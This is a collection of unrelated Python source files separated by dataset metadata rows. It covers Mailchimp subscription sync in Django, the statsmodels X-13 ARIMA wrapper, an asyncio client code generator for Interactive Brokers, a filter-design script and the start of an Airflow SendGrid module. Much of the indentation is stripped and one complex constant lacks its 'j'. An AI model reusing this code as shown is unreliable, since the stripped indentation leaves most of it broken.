mailchimp_msg = models.TextField(null=True, blank=True)
timestamp = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
def __str__(self):
return self.user.email
def marketing_pref_create_receiver(sender, instance, created, *args, **kwargs):
if created:
status_code, response_data = Mailchimp().subscribe(instance.user.email)
print(status_code, response_data)
post_save.connect(marketing_pref_create_receiver, sender=MarketingPreference)
def marketing_pref_update_receiver(sender, instance, *args, **kwargs):
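    # Keep the local preference and the Mailchimp list in sync: only call the
    # Mailchimp API when the desired state differs from the last known
    # Mailchimp state, then record the API response on the instance.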
if instance.subscribed != instance.mailchimp_subscribed:
if instance.subscribed:
# subscribing user
status_code, response_data = Mailchimp().subscribe(instance.user.email)
else:
# unsubscribing user
status_code, response_data = Mailchimp().unsubscribe(instance.user.email)
if response_data['status'] == 'subscribed':
instance.subscribed = True
instance.mailchimp_subscribed = True
instance.mailchimp_msg = response_data
else:
instance.subscribed = False
instance.mailchimp_subscribed = False
instance.mailchimp_msg = response_data
pre_save.connect(marketing_pref_update_receiver, sender=MarketingPreference)
def make_marketing_pref_receiver(sender, instance, created, *args, **kwargs):
'''
User model
'''
if created:
MarketingPreference.objects.get_or_create(user=instance)
post_save.connect(make_marketing_pref_receiver, sender=settings.AUTH_USER_MODEL)
| 33.903226 | 85 | 0.692198 | [
"MIT"
] | felipebrigo/Python-Projects | eCommerce-master/src/marketing/models.py | 2,102 | Python |
"""
Run x12/x13-arima specs in a subprocess from Python and carry the results back
into Python.
Notes
-----
Many of the functions are called x12. However, they are also intended to work
for x13. If this is not the case, it's a bug.
"""
import os
import subprocess
import tempfile
import re
from warnings import warn
import pandas as pd
from statsmodels.compat.python import iteritems
from statsmodels.tools.tools import Bunch
from statsmodels.tools.sm_exceptions import (X13NotFoundError,
IOWarning, X13Error,
X13Warning)
__all__ = ["x13_arima_select_order", "x13_arima_analysis"]
_binary_names = ('x13as.exe', 'x13as', 'x12a.exe', 'x12a')
class _freq_to_period:
def __getitem__(self, key):
if key.startswith('M'):
return 12
elif key.startswith('Q'):
return 4
elif key.startswith('W'):
return 52
_freq_to_period = _freq_to_period()
_period_to_freq = {12: 'M', 4: 'Q'}
_log_to_x12 = {True: 'log', False: 'none', None: 'auto'}
_bool_to_yes_no = lambda x: 'yes' if x else 'no' # noqa:E731
def _find_x12(x12path=None, prefer_x13=True):
"""
If x12path is not given, then either x13as[.exe] or x12a[.exe] must
be found on the PATH. Otherwise, the environmental variable X12PATH or
X13PATH must be defined. If prefer_x13 is True, only X13PATH is searched
for. If it is false, only X12PATH is searched for.
"""
global _binary_names
if x12path is not None and x12path.endswith(_binary_names):
# remove binary from path if given
x12path = os.path.dirname(x12path)
if not prefer_x13: # search for x12 first
_binary_names = _binary_names[::-1]
if x12path is None:
x12path = os.getenv("X12PATH", "")
if not x12path:
x12path = os.getenv("X13PATH", "")
elif x12path is None:
x12path = os.getenv("X13PATH", "")
if not x12path:
x12path = os.getenv("X12PATH", "")
for binary in _binary_names:
x12 = os.path.join(x12path, binary)
try:
subprocess.check_call(x12, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
return x12
except OSError:
pass
else:
return False
def _check_x12(x12path=None):
x12path = _find_x12(x12path)
if not x12path:
raise X13NotFoundError("x12a and x13as not found on path. Give the "
"path, put them on PATH, or set the "
"X12PATH or X13PATH environmental variable.")
return x12path
def _clean_order(order):
"""
    Takes something like (1 1 0)(0 1 1) and returns an (arma order, sarma
    order) tuple. Also accepts (1 1 0) and returns the arma order and (0, 0, 0).
"""
order = re.findall(r"\([0-9 ]*?\)", order)
def clean(x):
return tuple(map(int, re.sub("[()]", "", x).split(" ")))
if len(order) > 1:
order, sorder = map(clean, order)
else:
order = clean(order[0])
sorder = (0, 0, 0)
return order, sorder
def run_spec(x12path, specpath, outname=None, meta=False, datameta=False):
if meta and datameta:
raise ValueError("Cannot specify both meta and datameta.")
if meta:
args = [x12path, "-m " + specpath]
elif datameta:
args = [x12path, "-d " + specpath]
else:
args = [x12path, specpath]
if outname:
args += [outname]
return subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
def _make_automdl_options(maxorder, maxdiff, diff):
options = "\n"
options += "maxorder = ({0} {1})\n".format(maxorder[0], maxorder[1])
if maxdiff is not None: # maxdiff always takes precedence
options += "maxdiff = ({0} {1})\n".format(maxdiff[0], maxdiff[1])
else:
options += "diff = ({0} {1})\n".format(diff[0], diff[1])
return options
def _make_var_names(exog):
if hasattr(exog, "name"):
var_names = exog.name
elif hasattr(exog, "columns"):
var_names = exog.columns
else:
raise ValueError("exog is not a Series or DataFrame or is unnamed.")
try:
var_names = " ".join(var_names)
except TypeError: # cannot have names that are numbers, pandas default
from statsmodels.base.data import _make_exog_names
if exog.ndim == 1:
var_names = "x1"
else:
var_names = " ".join(_make_exog_names(exog))
return var_names
def _make_regression_options(trading, exog):
if not trading and exog is None: # start regression spec
return ""
reg_spec = "regression{\n"
if trading:
reg_spec += " variables = (td)\n"
if exog is not None:
var_names = _make_var_names(exog)
reg_spec += " user = ({0})\n".format(var_names)
reg_spec += " data = ({0})\n".format("\n".join(map(str,
exog.values.ravel().tolist())))
reg_spec += "}\n" # close out regression spec
return reg_spec
def _make_forecast_options(forecast_years):
if forecast_years is None:
return ""
forecast_spec = "forecast{\n"
forecast_spec += "maxlead = ({0})\n}}\n".format(forecast_years)
return forecast_spec
def _check_errors(errors):
errors = errors[errors.find("spc:")+4:].strip()
if errors and 'ERROR' in errors:
raise X13Error(errors)
elif errors and 'WARNING' in errors:
warn(errors, X13Warning)
def _convert_out_to_series(x, dates, name):
"""
Convert x to a DataFrame where x is a string in the format given by
x-13arima-seats output.
"""
from io import StringIO
from pandas import read_csv
out = read_csv(StringIO(x), skiprows=2,
header=None, sep='\t', engine='python')
return out.set_index(dates).rename(columns={1: name})[name]
def _open_and_read(fname):
# opens a file, reads it, and make sure it's closed
with open(fname, 'r') as fin:
fout = fin.read()
return fout
class Spec(object):
@property
def spec_name(self):
return self.__class__.__name__.replace("Spec", "")
def create_spec(self, **kwargs):
spec = """{name} {{
{options}
}}
"""
return spec.format(name=self.spec_name,
options=self.options)
def set_options(self, **kwargs):
options = ""
for key, value in iteritems(kwargs):
options += "{0}={1}\n".format(key, value)
self.__dict__.update({key: value})
self.options = options
class SeriesSpec(Spec):
"""
Parameters
----------
data
appendbcst : bool
appendfcst : bool
comptype
compwt
decimals
modelspan
name
period
precision
to_print
to_save
span
start
title
type
Notes
-----
Rarely used arguments
divpower
missingcode
missingval
saveprecision
trimzero
"""
def __init__(self, data, name='Unnamed Series', appendbcst=False,
appendfcst=False,
comptype=None, compwt=1, decimals=0, modelspan=(),
period=12, precision=0, to_print=[], to_save=[], span=(),
start=(1, 1), title='', series_type=None, divpower=None,
missingcode=-99999, missingval=1000000000):
appendbcst, appendfcst = map(_bool_to_yes_no, [appendbcst,
appendfcst,
])
series_name = "\"{0}\"".format(name[:64]) # trim to 64 characters
title = "\"{0}\"".format(title[:79]) # trim to 79 characters
self.set_options(data=data, appendbcst=appendbcst,
appendfcst=appendfcst, period=period, start=start,
title=title, name=series_name,
)
def pandas_to_series_spec(x):
# from statsmodels.tools.data import _check_period_index
# check_period_index(x)
if hasattr(x, 'columns'): # convert to series
if len(x.columns) > 1:
raise ValueError("Does not handle DataFrame with more than one "
"column")
x = x[x.columns[0]]
data = "({0})".format("\n".join(map(str, x.values.tolist())))
# get periodicity
# get start / first data
# give it a title
try:
period = _freq_to_period[x.index.freqstr]
except (AttributeError, ValueError):
from pandas.tseries.api import infer_freq
period = _freq_to_period[infer_freq(x.index)]
start_date = x.index[0]
if period == 12:
year, stperiod = start_date.year, start_date.month
elif period == 4:
year, stperiod = start_date.year, start_date.quarter
else: # pragma: no cover
raise ValueError("Only monthly and quarterly periods are supported."
" Please report or send a pull request if you want "
"this extended.")
if hasattr(x, 'name'):
name = x.name or "Unnamed Series"
else:
name = 'Unnamed Series'
series_spec = SeriesSpec(data=data, name=name, period=period,
title=name, start="{0}.{1}".format(year,
stperiod))
return series_spec
def x13_arima_analysis(endog, maxorder=(2, 1), maxdiff=(2, 1), diff=None,
exog=None, log=None, outlier=True, trading=False,
forecast_years=None, retspec=False,
speconly=False, start=None, freq=None,
print_stdout=False, x12path=None, prefer_x13=True):
"""
Perform x13-arima analysis for monthly or quarterly data.
Parameters
----------
endog : array_like, pandas.Series
The series to model. It is best to use a pandas object with a
DatetimeIndex or PeriodIndex. However, you can pass an array-like
object. If your object does not have a dates index then ``start`` and
``freq`` are not optional.
maxorder : tuple
The maximum order of the regular and seasonal ARMA polynomials to
examine during the model identification. The order for the regular
polynomial must be greater than zero and no larger than 4. The
order for the seasonal polynomial may be 1 or 2.
maxdiff : tuple
The maximum orders for regular and seasonal differencing in the
automatic differencing procedure. Acceptable inputs for regular
differencing are 1 and 2. The maximum order for seasonal differencing
is 1. If ``diff`` is specified then ``maxdiff`` should be None.
Otherwise, ``diff`` will be ignored. See also ``diff``.
diff : tuple
Fixes the orders of differencing for the regular and seasonal
differencing. Regular differencing may be 0, 1, or 2. Seasonal
differencing may be 0 or 1. ``maxdiff`` must be None, otherwise
``diff`` is ignored.
exog : array_like
Exogenous variables.
log : bool or None
If None, it is automatically determined whether to log the series or
not. If False, logs are not taken. If True, logs are taken.
outlier : bool
Whether or not outliers are tested for and corrected, if detected.
trading : bool
Whether or not trading day effects are tested for.
forecast_years : int
Number of forecasts produced. The default is one year.
retspec : bool
Whether to return the created specification file. Can be useful for
debugging.
speconly : bool
Whether to create the specification file and then return it without
performing the analysis. Can be useful for debugging.
start : str, datetime
Must be given if ``endog`` does not have date information in its index.
Anything accepted by pandas.DatetimeIndex for the start value.
freq : str
        Must be given if ``endog`` does not have date information in its
index. Anything accepted by pandas.DatetimeIndex for the freq value.
print_stdout : bool
The stdout from X12/X13 is suppressed. To print it out, set this
to True. Default is False.
x12path : str or None
The path to x12 or x13 binary. If None, the program will attempt
to find x13as or x12a on the PATH or by looking at X13PATH or
X12PATH depending on the value of prefer_x13.
prefer_x13 : bool
If True, will look for x13as first and will fallback to the X13PATH
environmental variable. If False, will look for x12a first and will
fallback to the X12PATH environmental variable. If x12path points
to the path for the X12/X13 binary, it does nothing.
Returns
-------
res : Bunch
A bunch object with the following attributes:
- results : str
The full output from the X12/X13 run.
- seasadj : pandas.Series
The final seasonally adjusted ``endog``
- trend : pandas.Series
The trend-cycle component of ``endog``
- irregular : pandas.Series
The final irregular component of ``endog``
- stdout : str
The captured stdout produced by x12/x13.
- spec : str, optional
Returned if ``retspec`` is True. The only thing returned if
``speconly`` is True.
Notes
-----
This works by creating a specification file, writing it to a temporary
    directory, invoking X12/X13 in a subprocess, and reading the output
back in.
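    Examples
    --------
    A minimal sketch, assuming the x13as/x12a binary is available on the PATH
    and ``y`` is a hypothetical monthly pandas Series with a DatetimeIndex:
    >>> res = x13_arima_analysis(y)  # doctest: +SKIP
    >>> res.seasadj.plot()  # doctest: +SKIP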
"""
x12path = _check_x12(x12path)
if not isinstance(endog, (pd.DataFrame, pd.Series)):
if start is None or freq is None:
raise ValueError("start and freq cannot be none if endog is not "
"a pandas object")
endog = pd.Series(endog, index=pd.DatetimeIndex(start=start,
periods=len(endog),
freq=freq))
spec_obj = pandas_to_series_spec(endog)
spec = spec_obj.create_spec()
spec += "transform{{function={0}}}\n".format(_log_to_x12[log])
if outlier:
spec += "outlier{}\n"
options = _make_automdl_options(maxorder, maxdiff, diff)
spec += "automdl{{{0}}}\n".format(options)
spec += _make_regression_options(trading, exog)
spec += _make_forecast_options(forecast_years)
spec += "x11{ save=(d11 d12 d13) }"
if speconly:
return spec
# write it to a tempfile
# TODO: make this more robust - give the user some control?
ftempin = tempfile.NamedTemporaryFile(delete=False, suffix='.spc')
ftempout = tempfile.NamedTemporaryFile(delete=False)
try:
ftempin.write(spec.encode('utf8'))
ftempin.close()
ftempout.close()
# call x12 arima
p = run_spec(x12path, ftempin.name[:-4], ftempout.name)
p.wait()
stdout = p.stdout.read()
if print_stdout:
            print(stdout)
# check for errors
errors = _open_and_read(ftempout.name + '.err')
_check_errors(errors)
# read in results
results = _open_and_read(ftempout.name + '.out')
seasadj = _open_and_read(ftempout.name + '.d11')
trend = _open_and_read(ftempout.name + '.d12')
irregular = _open_and_read(ftempout.name + '.d13')
finally:
try: # sometimes this gives a permission denied error?
# not sure why. no process should have these open
os.remove(ftempin.name)
os.remove(ftempout.name)
except OSError:
if os.path.exists(ftempin.name):
warn("Failed to delete resource {0}".format(ftempin.name),
IOWarning)
if os.path.exists(ftempout.name):
warn("Failed to delete resource {0}".format(ftempout.name),
IOWarning)
seasadj = _convert_out_to_series(seasadj, endog.index, 'seasadj')
trend = _convert_out_to_series(trend, endog.index, 'trend')
irregular = _convert_out_to_series(irregular, endog.index, 'irregular')
# NOTE: there is not likely anything in stdout that's not in results
# so may be safe to just suppress and remove it
if not retspec:
res = X13ArimaAnalysisResult(observed=endog, results=results,
seasadj=seasadj, trend=trend,
irregular=irregular, stdout=stdout)
else:
res = X13ArimaAnalysisResult(observed=endog, results=results,
seasadj=seasadj, trend=trend,
irregular=irregular, stdout=stdout,
spec=spec)
return res
def x13_arima_select_order(endog, maxorder=(2, 1), maxdiff=(2, 1), diff=None,
exog=None, log=None, outlier=True, trading=False,
forecast_years=None,
start=None, freq=None, print_stdout=False,
x12path=None, prefer_x13=True):
"""
Perform automatic seasonal ARIMA order identification using x12/x13 ARIMA.
Parameters
----------
endog : array_like, pandas.Series
The series to model. It is best to use a pandas object with a
DatetimeIndex or PeriodIndex. However, you can pass an array-like
object. If your object does not have a dates index then ``start`` and
``freq`` are not optional.
maxorder : tuple
The maximum order of the regular and seasonal ARMA polynomials to
examine during the model identification. The order for the regular
polynomial must be greater than zero and no larger than 4. The
order for the seasonal polynomial may be 1 or 2.
maxdiff : tuple
The maximum orders for regular and seasonal differencing in the
automatic differencing procedure. Acceptable inputs for regular
differencing are 1 and 2. The maximum order for seasonal differencing
is 1. If ``diff`` is specified then ``maxdiff`` should be None.
Otherwise, ``diff`` will be ignored. See also ``diff``.
diff : tuple
Fixes the orders of differencing for the regular and seasonal
differencing. Regular differencing may be 0, 1, or 2. Seasonal
differencing may be 0 or 1. ``maxdiff`` must be None, otherwise
``diff`` is ignored.
exog : array_like
Exogenous variables.
log : bool or None
If None, it is automatically determined whether to log the series or
not. If False, logs are not taken. If True, logs are taken.
outlier : bool
Whether or not outliers are tested for and corrected, if detected.
trading : bool
Whether or not trading day effects are tested for.
forecast_years : int
Number of forecasts produced. The default is one year.
start : str, datetime
Must be given if ``endog`` does not have date information in its index.
Anything accepted by pandas.DatetimeIndex for the start value.
freq : str
        Must be given if ``endog`` does not have date information in its
index. Anything accepted by pandas.DatetimeIndex for the freq value.
print_stdout : bool
The stdout from X12/X13 is suppressed. To print it out, set this
to True. Default is False.
x12path : str or None
The path to x12 or x13 binary. If None, the program will attempt
to find x13as or x12a on the PATH or by looking at X13PATH or X12PATH
depending on the value of prefer_x13.
prefer_x13 : bool
If True, will look for x13as first and will fallback to the X13PATH
environmental variable. If False, will look for x12a first and will
fallback to the X12PATH environmental variable. If x12path points
to the path for the X12/X13 binary, it does nothing.
Returns
-------
results : Bunch
A bunch object that has the following attributes:
- order : tuple
The regular order
- sorder : tuple
The seasonal order
- include_mean : bool
Whether to include a mean or not
- results : str
The full results from the X12/X13 analysis
- stdout : str
The captured stdout from the X12/X13 analysis
Notes
-----
This works by creating a specification file, writing it to a temporary
directory, invoking X12/X13 in a subprocess, and reading the output back
in.
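    Examples
    --------
    A minimal sketch, under the same assumptions as ``x13_arima_analysis``:
    >>> res = x13_arima_select_order(y)  # doctest: +SKIP
    >>> res.order, res.sorder  # doctest: +SKIP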
"""
results = x13_arima_analysis(endog, x12path=x12path, exog=exog, log=log,
outlier=outlier, trading=trading,
forecast_years=forecast_years,
maxorder=maxorder, maxdiff=maxdiff, diff=diff,
start=start, freq=freq, prefer_x13=prefer_x13)
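    # The chosen model is reported in the x13 output as a line such as
    # "Final automatic model choice : (0 1 1)(0 1 1)"; _clean_order turns that
    # text into the (order, seasonal order) tuples returned below.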
model = re.search("(?<=Final automatic model choice : ).*",
results.results)
order = model.group()
if re.search("Mean is not significant", results.results):
include_mean = False
elif re.search("Constant", results.results):
include_mean = True
else:
include_mean = False
order, sorder = _clean_order(order)
res = Bunch(order=order, sorder=sorder, include_mean=include_mean,
results=results.results, stdout=results.stdout)
return res
class X13ArimaAnalysisResult(object):
def __init__(self, **kwargs):
for key, value in iteritems(kwargs):
setattr(self, key, value)
def plot(self):
from statsmodels.graphics.utils import _import_mpl
plt = _import_mpl()
fig, axes = plt.subplots(4, 1, sharex=True)
self.observed.plot(ax=axes[0], legend=False)
axes[0].set_ylabel('Observed')
self.seasadj.plot(ax=axes[1], legend=False)
axes[1].set_ylabel('Seas. Adjusted')
self.trend.plot(ax=axes[2], legend=False)
axes[2].set_ylabel('Trend')
self.irregular.plot(ax=axes[3], legend=False)
axes[3].set_ylabel('Irregular')
fig.tight_layout()
return fig
| 36.837971 | 79 | 0.608095 | [
"BSD-3-Clause"
] | diego-mazon/statsmodels | statsmodels/tsa/x13.py | 22,508 | Python |
from ib_tws_server.codegen.generator_utils import GeneratorUtils
from ib_tws_server.api_definition import *
from ib_tws_server.codegen.generator_utils import *
import inspect
def forward_method_parameters_dict_style(params: List[inspect.Parameter]) -> str:
return ",".join([ f"{v.name} = {v.name}" for v in params ])
def request_state_member_name(d: ApiDefinition):
return f"_req_state"
def subscription_member_name(d: ApiDefinition):
return f"_subscriptions"
def response_instance(d: ApiDefinition, m: Callable):
callback_type,is_wrapper = GeneratorUtils.callback_type(d, m)
if is_wrapper:
return f"{callback_type}({forward_method_parameters_dict_style(GeneratorUtils.data_class_members(d, [m], False))})"
else:
return GeneratorUtils.data_class_members(d, [m], False)[0].name
def streaming_instance(d: ApiDefinition, m: Callable):
callback_type,is_wrapper = GeneratorUtils.callback_type(d, m)
if is_wrapper:
return f"{callback_type}({forward_method_parameters_dict_style(GeneratorUtils.data_class_members(d, [m], True))})"
else:
return GeneratorUtils.data_class_members(d, [m], False)[0].name
def request_id(d: ApiDefinition, m: Callable):
if not d.uses_req_id:
return f"'{d.request_method.__name__}'"
else:
return GeneratorUtils.req_id_param_name(m)
def current_request_state(d: ApiDefinition, m: Callable):
return f"self.{request_state_member_name(d)}[{request_id(d, m)}]"
def bind_method(d: ApiDefinition, m: Callable, param_values: List[str]) -> str:
param_values[0] = f"self._client.{m.__name__}"
return f"functools.partial({','.join(param_values)})"
class AsyncioClientGenerator:
@staticmethod
def generate(filename):
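        # The nested helpers below each emit a snippet of the generated source:
        # request methods that wrap EClient calls in asyncio futures,
        # subscription setup for streaming requests, and cancel wrappers.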
def init_callback(d: ApiDefinition, m: Callable, cb: str):
if d.callback_methods is not None or d.done_method is not None:
return f"{current_request_state(d,m)}.{cb} = {cb}"
return ""
def init_request_id(d: ApiDefinition, u: Callable):
if d.uses_req_id:
return f"{GeneratorUtils.req_id_param_name(d.request_method)} = self.next_request_id()"
else:
return ""
def init_subscription(d: ApiDefinition):
if d.cancel_method is None:
raise RuntimeError(f"Request does not support cancellation {d.request_method.__name__}")
current_subscription = f"self.{subscription_member_name(d)}[{request_id(d, d.request_method)}]"
return f"{current_subscription}= SubscriptionGenerator(self.__{d.cancel_method.__name__}, {GeneratorUtils.req_id_param_name(d.request_method)})"
def async_request_method(d: ApiDefinition, is_subscription: bool):
method_name = GeneratorUtils.request_method_name(d, is_subscription)
original_sig = GeneratorUtils.signature(d.request_method)
signature = GeneratorUtils.request_signature(d, is_subscription)
param_values = [ p.name if p.name != d.subscription_flag_name else f"{d.subscription_flag_value if is_subscription else not d.subscription_flag_value}" for p in original_sig.parameters.values() ]
if is_subscription:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
{init_request_id(d, d.request_method)}
ret: SubscriptionGenerator = None
with self._lock:
ret = {init_subscription(d)}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
return ret"""
if d.callback_methods is not None or d.done_method is not None:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
loop = asyncio.get_running_loop()
future = loop.create_future()
def cb(res: {GeneratorUtils.request_return_type(d, is_subscription)}):
loop.call_soon_threadsafe(future.set_result, res)
{init_request_id(d, d.request_method)}
with self._lock:
{init_callback(d, d.request_method, 'cb')}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
res = (await future)
if isinstance(res, IbError):
raise res
return res"""
else:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
{init_request_id(d, d.request_method)}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
return None"""
def cancel_method(d: ApiDefinition):
return f"""
def __{GeneratorUtils.method_declaration(d.cancel_method)}:
{GeneratorUtils.doc_string(d.cancel_method)}
self.cancel_request({request_id(d,d.cancel_method)})
self._writer.queue.put({bind_method(d, d.cancel_method, list(GeneratorUtils.signature(d.cancel_method).parameters))})"""
with open(filename, "w") as f:
f.write(f"""
import asyncio
import functools
from collections import defaultdict
from ibapi.client import EClient
from ib_tws_server.asyncio.ib_writer import IBWriter
from ib_tws_server.asyncio.request_state import *
from ib_tws_server.asyncio.subscription_generator import SubscriptionGenerator
from ib_tws_server.error import *
from ib_tws_server.gen.client_responses import *
from ib_tws_server.gen.asyncio_wrapper import *
from ib_tws_server.ib_imports import *
from threading import Lock, Thread
import time
from typing import Callable, Dict, List, Tuple
class AsyncioClient():
_lock: Lock
_req_state: Dict[str, RequestState]
_subscriptions: Dict[int, SubscriptionGenerator]
_wrapper: AsyncioWrapper
_client: EClient
def __init__(self):
self._lock = Lock()
self._current_request_id = 0
self._req_state = defaultdict(RequestState)
self._subscriptions = defaultdict(SubscriptionGenerator)
self._wrapper = AsyncioWrapper(self._lock, self._req_state, self._subscriptions)
self._client = EClient(self._wrapper)
self._writer = IBWriter(self._client)
self._wrapper._writer = self._writer
def run(self):
self._writer.start()
self._client.run()
def next_request_id(self):
with self._lock:
self._current_request_id += 1
return self._current_request_id
def disconnect(self, clean=False):
self._wrapper._expecting_disconnect = clean
return self._client.disconnect()
def cancel_request(self, id: RequestId):
response_cb = None
with self._lock:
if id in self._req_state:
response_cb = self._req_state[id].cb
del self._req_state[id]
if id in self._subscriptions:
del self._subscriptions[id]
if response_cb is not None:
response_cb(None)
def start(self, host: str, port: int, client_id: int, connection_retry_interval: int):
while True:
try:
self._client.connect(host, port, client_id)
break
except ConnectionError as e:
if connection_retry_interval > 0:
time.sleep(connection_retry_interval)
else:
raise e
thread = Thread(target = self.run)
thread.start()
setattr(thread, "_thread", thread)
def active_request_count(self):
with self._lock:
return len(self._req_state)
def active_subscription_count(self):
with self._lock:
return len(self._subscriptions)
"""
)
for d in REQUEST_DEFINITIONS:
if d.request_method is not None:
if d.subscription_flag_name is not None:
f.write(async_request_method(d, False))
f.write(async_request_method(d, True))
else:
f.write(async_request_method(d, d.is_subscription))
if d.cancel_method is not None and (d.is_subscription or d.subscription_flag_name is not None):
f.write(cancel_method(d))
class AsyncioWrapperGenerator:
@staticmethod
def generate(filename):
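        # Mirrors AsyncioClientGenerator.generate: the nested helpers emit
        # EWrapper callback bodies that either accumulate a response for a
        # pending request or forward streaming data to an active subscription.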
def update_response(d: ApiDefinition, m:Callable):
if GeneratorUtils.response_is_list(d):
return f"""
if {request_id(d, m)} in self._req_state:
req_state = {current_request_state(d, m)}
if req_state.response is None:
req_state.response = []
req_state.response.append({response_instance(d, m)})"""
else:
return f"""
if {request_id(d, m)} in self._req_state:
req_state = {current_request_state(d, m)}
if req_state is not None:
req_state.response = {response_instance(d, m)}"""
def call_response_cb(d: ApiDefinition, m: Callable):
if d.callback_methods is not None:
return f"self.call_response_cb({request_id(d,m)})"
else:
return ""
def call_response_cb_if_done(d: ApiDefinition, m: Callable):
if d.has_done_flag:
return f"""
if (done):
{call_response_cb(d, m)}"""
elif not GeneratorUtils.response_is_list(d):
return f"""
{call_response_cb(d,m)}"""
else:
return ""
def callback_method(d: ApiDefinition, m: Callable):
if d.subscription_flag_name is not None:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
is_subscription: bool = False
with self._lock:
is_subscription = {request_id(d, m)} in self._subscriptions
{update_response(d, m)}
if is_subscription:
self.call_streaming_cb({request_id(d,m)}, {streaming_instance(d,m)})
return
{call_response_cb_if_done(d, m)}"""
elif not d.is_subscription:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
with self._lock:
{update_response(d, m)}
{call_response_cb_if_done(d, m)}"""
else:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
self.call_streaming_cb({request_id(d,m)}, {streaming_instance(d,m)})"""
def done_method(d: ApiDefinition):
return f"""
def {GeneratorUtils.method_declaration(d.done_method)}:
{GeneratorUtils.doc_string(d.done_method)}
{call_response_cb(d,d.done_method)}"""
with open(filename, "w") as f:
f.write(f"""
from ibapi.wrapper import EWrapper
from ib_tws_server.asyncio.ib_writer import IBWriter
from ib_tws_server.asyncio.request_state import *
from ib_tws_server.asyncio.subscription_generator import SubscriptionGenerator
from ib_tws_server.error import *
from ib_tws_server.gen.client_responses import *
from ib_tws_server.ib_imports import *
from threading import Lock
from typing import Dict, List
class AsyncioWrapper(EWrapper):
_lock: Lock
_req_state: Dict[str, RequestState]
_subscriptions: Dict[int, SubscriptionGenerator]
_expecting_disconnect: bool
_writer: IBWriter
def __init__(self, lock: Lock, req_state: Dict[str, RequestState], subscriptions: Dict[int, SubscriptionGenerator]):
self._lock = lock
self._req_state = req_state
self._subscriptions = subscriptions
EWrapper.__init__(self)
self._expecting_disconnect = False
def connectionClosed(self):
if self._expecting_disconnect:
# Wake up writer
self._writer.queue.put(lambda *a, **k: None)
else:
raise ConnectionError("Unexpected disconnect")
def call_response_cb(self, id: RequestId, res=None):
cb = None
with self._lock:
if not id in self._req_state:
return
s = self._req_state[id]
cb = s.cb
if res is None:
res = s.response
del self._req_state[id]
if cb is not None:
cb(res)
def error(self, reqId: int, errorCode: int, errorString: str):
cb = None
if reqId is not None:
with self._lock:
if reqId in self._req_state:
s = self._req_state[reqId]
cb = s.cb
del self._req_state[reqId]
if cb is not None:
cb(IbError(errorString, errorCode))
else:
super().error(reqId, errorCode, errorString)
def call_streaming_cb(self, id: RequestId, res: any):
cb = None
loop = None
with self._lock:
if id in self._subscriptions:
s = self._subscriptions[id]
cb = s.add_to_queue
loop = s._loop
if loop is not None:
loop.call_soon_threadsafe(cb, res)
""")
for d in REQUEST_DEFINITIONS:
if d.request_method is not None:
if d.callback_methods is not None:
for m in d.callback_methods:
f.write(callback_method(d, m))
if d.done_method is not None:
f.write(done_method(d))
| 38.153631 | 207 | 0.628157 | [
"MIT"
] | ncpenke/ib_tws_server_py | ib_tws_server/codegen/asyncio_client_generator.py | 13,659 | Python |
import numpy as np
import scipy.signal as signal
import matplotlib.pyplot as plt
FS = 48000.0
FREQ = 9000
omega = 2 * np.pi * FREQ
r = np.array([251589, -130428 - 4165j, -130428 + 4165j, 4634 - 22873j, 4634 + 22873j])
p = np.array([-46580, -55482 + 25082j, -55482 - 25082j, -26292 - 59437j, -26292 + 59437j])
r = np.array([5092.0, -11256.0 - 99566.0j, -11256.0 + 99566.0, -13802.0 - 24606.0j, -13802.0 + 24606.0j])
p = np.array([-176261.0, -51468.0 - 21437.0j, -51468.0 + 21437.0j, -26276.0 - 59699.0j, -26276.0 + 59699.0j])
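# H0 is the numerator of the pole-residue sum r_i / (s - p_i) evaluated at
# s = 0, so freqs_zpk([], p, H0) below gives an all-pole model whose gain
# matches the original response at DC (the numerator zeros are dropped).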
H0 = 0
for i in range(5):
prod = r[i]
for k in range(5):
if i == k:
continue
prod *= p[k]
H0 += prod
print(H0)
# print(z)
# print(p)
worN=np.logspace(1, 5, 1000)
w, h = signal.freqs_zpk([], p, H0, worN)
plt.figure()
plt.semilogx(w, 20 * np.log10(abs(h)))
fc = 500.0
# freq_factor = fc / 9400
freq_factor = fc / 11000
r = r * freq_factor
p = p * freq_factor
H0 = 0
for i in range(5):
prod = r[i]
for k in range(5):
if i == k:
continue
prod *= p[k]
H0 += prod
w, h = signal.freqs_zpk([], p, H0, worN)
plt.semilogx(w, 20 * np.log10(abs(h)))
z, p, k = signal.butter(5, 2 * np.pi * fc, analog=True, output='zpk')
w, h = signal.freqs_zpk(z, p, k, worN)
plt.semilogx(w, 20 * np.log10(abs(h)))
plt.xlabel('Frequency')
plt.ylabel('Amplitude response [dB]')
plt.ylim(-90)
plt.grid()
# plt.figure()
# plt.plot(z.real, z.imag, 'go')
# plt.plot(p.real, p.imag, 'rx')
# plt.grid()
plt.show()
| 22.666667 | 109 | 0.589572 | [
"BSD-3-Clause"
] | jatinchowdhury18/BBDDelay | sim/filter_design.py | 1,496 | Python |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Airflow module for sending email using SendGrid
"""
import base64
import logging
import mimetypes
import os
from typing import Dict, Iterable, Optional, Union
import sendgrid
from sendgrid.helpers.mail import (
Attachment,
Category,
Content,
CustomArg,
Email,
Mail,
MailSettings,
Personalization,
SandBoxMode,
)
